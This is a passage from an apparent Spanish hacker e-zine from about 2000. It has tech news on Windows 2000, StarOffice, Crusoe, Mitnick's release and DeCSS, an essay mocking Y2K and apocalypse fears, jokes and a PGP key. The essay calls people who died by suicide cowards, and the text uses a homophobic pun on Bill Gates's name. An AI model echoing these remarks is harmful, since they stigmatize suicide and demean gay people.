Parece ser que el winbugs 2000 le costo ala empresa del viejo bill Gay dos mil millones de dolares
y tiene alrededor de 30 millones de lineas de programacion.
Asi que administradores de servers ya estan avisados para que luego no tengan visitas no deseadas
en sus makinas ;).
Star Office 5.1
~~~~~~~~~~~~~~~~
Usuarios de M0cosotf Office, ya tinen una mejor alternativa y es totalmente gratis, pues si se
trata del Star Office 5.1 de Sun Microsystems, esta nueva suite trae varia aplicaciones que podrian
reemplazar plen de formulas matematicas.
-StarChart: Herramienta para la generacion de graficos un complemento de StarMath.
-StarWriter: Es un potente procesador de palabras.
Lo Mejor de todo es que esta suite tambien esta para el mejor para el S.O.. LINUX.
Para mas informacion visite la pagina web de Sun en: http://www.sun.com/staroffice
lo mejor de todo es GRATIS¡¡¡¡...
Crusoe
~~~~~~~
Asi se llama el nuevo procesador de Transmeta la empresa donde trabaja el admirado programador
Linus Torvalds. El nuevo procesador trabaja principalmente a base de software, gracias a esto
crusoe tiene 75% menos transistores que un procesador convencional, por eso es mas pequeno,
produce menos calor y requiere menos energia. Crusoe No es un chip x86, sin embargo puede ejecutar
el mismo software que un procasador x86 (Linux, winbugs), gracias a algo que se llama el Code
Morphing.
Kevin Mitnick en Libertad
~~~~~~~~~~~~~~~~~~~~~~~~~~
Considerado por las autoridades Estado Unidenses Como el Hacker mas peligroso del mundo el condor
(ese es su nick) fue liberado el 21 de enero, despues de purgar una pena de cerca de 5 anos. Como
parte del castigo Mitnick no podra utilizar computadores, equipos derivados, ni usar telefonos
celulares, sin permiso previo de las autoridades...
Se Rompio el esquema de Encriptacion del DVD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El programa llamado DeCSS, fue escrito por un programador Noruego de 16 anos, y que permite
que el usuario salte el esquema de encriptacion, los programadores dicen que en ningun momento
decidieron hacer el programa para piratear DVD, sino para utilizar sus peliculas para verlas en ek
S.O. LINUX. Las companias de Holliwood estan tratando de detener la proliferacion de dicho programa.
mas informacion en:
- www.dvd-copy.com
- www.crackdown.com
- www.ct2600.com
El Reloj de la Muerte
~~~~~~~~~~~~~~~~~~~~~
El sitio deathclock.com (reloj de la muerte) dice que la fecha en la que el viejo bill gay morira
sera el 10 de julio del ano 2029. Usted puede averiguar el dia de su muerte llenando un formulario
con la fecha de nacimiento, sexo y personalidad, encontrara la fecha de algunas celebridades.
su sitio wes es : www.deathclock.com
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
Derrumbando Muros de Ignorancia
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
Bien estamos aqui, con las expectativas que nos puede brindar este siglo
abriendo las puertas de los avances tecnologicos y demas cosas positivas
sin dejar aun lado las negativas; la cuales hare mayor enfasis y un breve
resumen de las mismas , y son las estupideces generadas como siempre por
un grupito de capitalistas, mediocres e ignorantes con la llegada del nuevo
milenio , el tan esperado y2k que al fin al cabo fue todo un fraude, o bien
podriamos llamarle "LA ESTAFA DEL SIGLO".
Aquellos que se chuparon todo este cuento y aun tienen la idea en que en verdad
solucionaron sus problemas ya sea por medio de un software, actualizaciones etc.
Que no desesperen ya solo faltan poco m s de 364.000 dias para el [Efecto 3000]...
Asi como tambien otra que entra en la categoria de las mas estupidas
"EL FINAL DEL MUNDO", donde muchas personas cegadas por la ignorancia
pensaban/temian que llegaria el fin de toda la humanidad, donde ademas
surgieron una gran cantidad de falsos profetas, dando origen a sectas y
doctrinas. Nada mas alejado de toda verdad y razonamiento.
Muchas de estas personas tomaron la decision ya sea individual o colectiva,
persuadidos por el fanatismo y una apocalictica paranoia de quitarse la
vida :(((((
Pienso que llegar a ese extremo es algo bien estupido, pues hay muchas
cosas por las cuales luchar en este mundo. Una meta que alcanzar/trazar.
Una disyuntiva ante la cual habra que decidir o elegir que no sea la antes
mencionada.
A mi entender, quien toma esta decision es un "COBARDE" y un poco mas... >:->
Asi vemos tambien como en nuestro pais proclamaban un candidato presidencial
de 96 anos (JOAQUIN BALAGUER), totalmente carente de toda logica, NO CREEN?
Pero ademas de esto, UN DICTADOR, ASESINO, alguien que tuvo por mas de 12 a¤os
al pueblo dominicano bajo la mas CRUELES TORTURAS, DESAPARICIONES, PRESION,
MIEDO. Cegandoles la vida a los futuros lideres de nuestro pais, personas
inocentes y demases >:-> .
De verdad no puedo creer lo ignorantes que somos. Y es que no comprendo, mi
pregunta es:
¨Cuesta tanto trabajo deternenos a pensar/analizar las cosas?
Quemar unas cuantas neuronas, un POR QUE?, buscar la repuesta por si solos; y
no dejarnos arrastrar por falsas filosofias, cuyo fin es el de sumergirnos
cada vez mas y mas en un mar de incertidumbre.
LlEvANdO kOMO SI FuESe unA COnDEnA, eL TiTuLo:
"PROHIBIDO PENSAR, QUE TODO ESTA ESCRITO".
Y estas estupideces no solo suceden a nivel informatico; sino en otros renglo-
nes de la vida diaria, por mencionar algunos:
GLOBALIZACION, MONOPOLIO, LIBERTAD, PRIVATIZACION, ABORTO, GUERRAS, AMOR/AMISTAD,
EFECTO 2000 (Y2K), HACKER, CRACKER, PIRATA INFORMATICO, VIRUS, DROGAS, RAZA, RELIGION,
SATANISMO, SEXO, ESTADO, CLONACION. etc.
Los cuales son malinterpretados por las masas, ya sea por ignorancia o por interese$$$, etc.
Pienso que esta de mas explicar c/u de estos terminos, tu debes buscar las
respuestas a tus preguntas, detenerte a pensar/analizar el porque de las cosas
como mencionaba mas arriba. Tratar de ver la realidad desde otros puntos de vista
que no sea lo que el GRAN HERMANO quiere que pensemos y actuemos, como si fuesemos
marionetas. Aquellas ideas vagas pero que aun siguen difusas...
Solo me resta decir:
"HE CUMPLIDO CON MI PARTE, AHORA YA TIENES CON QUE EN ENCENDER EL CEREBRO, SAL
AHI AFUERA Y TRATA DE MANTENERLO ENCENDIDO". OK
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Humor
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Bien aki los dejo con un poco de humor, espero que los chistes sean de su
agrado, en caso de no ser asi presionen ALT + F4.
je je je
LA CREACION
^^^^^^^^^^^
1. En el principio DIOS creo el Bit y el Byte. Y de ellos creo la
Palabra. Y habia dos Bytes en la Palabra; y nada mas existia. Y Dios
separa el Uno del Cero: y vio que era bueno.
2. Y Dios dijo: que se hagan los Datos; y asi sucedia. Y Dios dijo:
Dejemos los Datos en sus correspondientes lugares. Y creo los disketes,
los discos duros y los discos compactos.
3. Y Dios dijo: que se hagan las computadoras, asi habra un lugar para
poner los disketes, los discos duros y los discos compactos. Asi Dios
creo a las computadoras, y les llamo hardware.
4. Pero aun no habia software. Pero Dios crea los programas; grandes y
pequenos... Y les dijo: Iros y multiplicaros y llenad toda la memoria.
5. Y Dios dijo: creare el Programador; y el Programador creara nuevos
programas y gobernara las computadoras y los programas y los datos.
6. Y Dios crea al Programador; y lo puso en el Centro de Datos; y Dios
le enseno al Programador el Directorio y le dijo: Puedes usar todos los
volúmenes y subdirectorios, pero NO USES WINDOWS.
7. Y Dios dijo: no es bueno que el Programador este solo. Tomo un hueso
del cuerpo del Programador y creo una criatura que miraria al
Programador; y admiraria al Programador; y amaria las cosas que el
Programador hiciese. Y Dios llamo a la criatura el Usuario.
8. Y el Programador y el Usuario fueron dejados en el desnudo DOS, y
eso era Bueno.
9. Pero Bill era mas listo que todas las otras criaturas de Dios. Y
Bill le dijo al Usuario: ¿Te dijo Dios realmente que no ejecutaras
todos los programas?
10. Y el Usuario respondia: Dios nos dijo que podiamos usar
cualquier programa y cualquier pedazo de datos, pero nos dijo
que no ejecutasemos Windows o moririamos.
11. Y Bill le dijo al Usuario: ¿Camo puedes hablar de algo que ni
siquiera has probado?. En el momento en que ejecutes Windows seras
igual a Dios. Seras capaz de crear cualquier cosa que quieras con el
simple toque del ratan.
12. Y el Usuario vio que los frutos del Windows eran mas bonitos y
faciles de usar. Y el Usuario vio que todo conocimiento era inútil, ya
que Windows podia reemplazarlo.
13. Asi, el Usuario instala Windows en su computadora; y le dijo al
Programador que era bueno.
14. Y el Programador inmediatamente empeza a buscar nuevos
controladores. Y Dios le pregunto: ¿Que buscas? Y el Programador
respondia: Estoy buscando nuevos controladores, porque no puedo
encontrarlos en el DOS. Y Dios dijo: ¿Quien te dijo que necesitabas
nuevos controladores? ¿Acaso ejecutaste Windows? Y el Programador dijo:
fue Bill quien nos lo dijo...
15. Y Dios le dijo a Bill: Por lo que hiciste, seras odiado por
todas las criaturas. Y el Usuario siempre estara descontento contigo.
Y, peor aun, siempre venderas Windows.
16. Y Dios le dijo al Usuario: por lo que hiciste, el Windows te
enganara y se comera todos tus recursos; y tendras que usar malos
programas; y siempre permaneceras bajo la tutela del Programador.
17. Y Dios le dijo al Programador: por haber escuchado al Usuario
nunca seras feliz. Todos tus programas tendran errores y tendras que
corregirlos y corregirlos hasta el final de los tiempos.
18. Y Dios los expulso a todos del Centro de Datos y bloqueo la
puerta con un password...
FUNERAL
^^^^^^^
Hay un funeral y en eso va pasando por la calle principal la carroza f£nebre y
detras un ni¤o, que lloraba:
- Papito esperame!, esperame yo quiero irme contigo papito!.
Y la gente alrededor dec¡a:
- Pobrecito qued¢ hurfano.
- Qu l stima.
- Bueno Dios se apiadara de el.
Y el ni¤o segu¡a deciendo:
- Papito esperame!, esperame yo quiero irme contigo papito, esperame.
Y en eso la carroza f£nebre se para y se baja el chofer furioso y grita:
- Mierda! pa todos lados quieres que te lleve!. Subete al carro antes de que
te de un cachetazo.
MATRIMONIO
^^^^^^^^^^^
Mi amor, hoy estamos de aniversario de matrimonio,
¿por que no matamos un pollo?
- ¿Y que culpa tiene el pollo?,
¿por que no matamos a tu hermano que fue el que nos presenta?
OTRO MAS DE MATRIMONIO
^^^^^^^^^^^^^^^^^^^^^^
Un matrimonio cumple 25 anos de casado y la esposa le pregunta al marido:
- Mi amor ¿que me vas a regalar para nuestras bodas de plata?
El tipo le responde:
- Un viaje a China.
La mujer sorprendida por la magnitud del regalo, le pregunta:
- Pero mi amor, si para los 25 anos me regalas esto,
¿que vas a hacer para cuando cumplamos los 50?
- Te voy a ir a buscar.
CONTINUAN LOS CHISTES DE MATRIMONIO
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
El marido se acaba de ganar la loteria y le
dice a la mujer "mija empaque maletas" y la
mujer le responde "que nos vamos de viaje"...
y el esposo le dice NO te me LaRgas de la CAsa...
ESTE EL ULTIMO PARA NO HARTARLOS ;)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Un senor va donde su amigo y le dice ve
hoy es el dia mas triste de mi dia
y el otro le dice porque... es que caminaba
mi mujer por la calle con el perro y la cojio
un carro... y el otro le dice huy que pesar
con su esposa... cual pesar si yo estoy llorando
es por mi perro.
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Despedida
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Hasta aki el final de esta entrega, esperamos que les haya gustado; dentro
poco tiempo estaremos con la 3ra. edicion. Como siempre pensando en
llevarles/darles a ustedes entrega tras entrega lo mejor de nosotros.
Solo me resta decir; F3LZ hAcK! y aquellas mentes inquietas, hackers, wannabes,
novatos y demases que se animen a kolaborar, para poder seguir haciendo esto posible.
Gracias!
__ _________ __ ___________
| | __ / _____/| |__ \__ ___/___ _____ _____
| |/ / \_____ \ | | \ | |_/ __ \\__ \ / \
| < / \| Y \ | |\ ___/ / __ \| Y Y \
|__|_ \/_______ /|___| / |____| \___ >____ /__|_| /
\/ \/ \/ \/ \/ \/
E-mail: ksh_team@bigfoot.com
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Llave PGP
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQGiBDjc894RBADGOLzwa3qcmZb6XPJgRaexY0UkjUqDZ5kwRBm6eQ8kSfHYUW7u
HPjEHNqEi2xOE3L/VvUQSKzubVafoTOdElXVGlAER/CUWmZsnsZjGa4BhhU8DB5+
9NQySWkoSW9dssWSSHcv423g/BxQKGRfEGcpxLs3GL7nDZHsY7aYGUGpVQCg/9el
GLXcCWm3PCGH4xDZdNsKzdEEALYi8kLvN8q6/7Lw4RVLfAwLfHnC+OO/VofHbQn6
RZp2RtQQaosqu68dXmZNb+jBMQnDfTqCpC7l1yeVABuAMZnYvB8zMUdCLAS+kUVm
wazkvnR5K1QFCHcGqf56HlVNbCtTQHqKMi2Um3N0SzPMQ6/XpKDK+6jLkY6fRcIC
3j5yBAC55M6v/fv7Fcku3YE0P3gy3sZfP1XOZNzFz8CQkrFdAHAn0adHIS6HEfCF
ZQ1h1h6EpR4BZWIrKv/1TlTrc/IynBzgcAVLtzrW783CO3xH2mLjt3lpjLTPmCYQ
II1mi6J1Y7eS7Minp9QmAy6xzjk5sN+JdKKGGFxeh2KwWb/jt7QfS3NIIFRlYW0g
PGtzaF90ZWFtQGJpZ2Zvb3QuY29tPokASwQQEQIACwUCONzz3gQLAwIBAAoJEPL4
IgA5VEV5InQAoNc6pOZzYnkZdP3l6Th50yxnZW8oAKCAkjD196WiMVc6WwAqX07C
TrP9GrkDDQQ43PPfEAwAzB13VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmw
ch04dfv2wXPEgxEmK0Ngw+Po1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90
hE/K8xfzpEDp19J3tkItAjbBJstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2
Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33
TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBh
znzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmsz
bDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1
Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9
iUsiGSa6q6Jew1XpTDJvAAICDADFt8A7wNSTTt4ea0MlKaA6vbsgHKEmoA683Cto
TmDrrkzehjokWcwk0FZvJVTExnkkTqcdq89BfdA8TV3xAaCMRKXZMPpb+UJ1CjOa
jGP7sSmSa+YOzXOa/Z483UR1fTWRBKmq3peXMqAq/WGUypELoqzRmthojdZgexgx
HLkQTIiPu8vlxemF4lw7D4Ky02or+o7HeCibxg64C0tPXAmoRJOyMRgYaGxfXRly
4b+PCAzfv0SznI0tno03sLKUqMPSuWw52gqiLgvN14OZR0o/vNYIc8xzLM5WR9Il
ebXwKGlBISi1+ElTndJcMkgObTcaOElvdZPwtHC3aoX7AsMlECsb+zgNawiz11xa
EG3w1h1SKO33Tnr/Wd9gaf3geIWvVdFl/tuI86Wq+J8ErvxGX1We4nmDT2sD/oqe
rkrb2GCwM+OxOu7ElVRa7iah/7+Evb3XjLySvHrs/l3Krmeg889GqR1x5NUrTXGJ
ro70kuIxpCHCFv+F6tKYgFyES8CJAEYEGBECAAYFAjjc898ACgkQ8vgiADlURXk0
1ACffhUmNTHmjBaGnlq0iJ0VAjdi/yQAnRGAJJqdxm71fouKGYPb54YntR1O
=kfKd
-----END PGP PUBLIC KEY BLOCK-----
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
kSh kSh kSh kSh kSh kSh kSh kSh
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°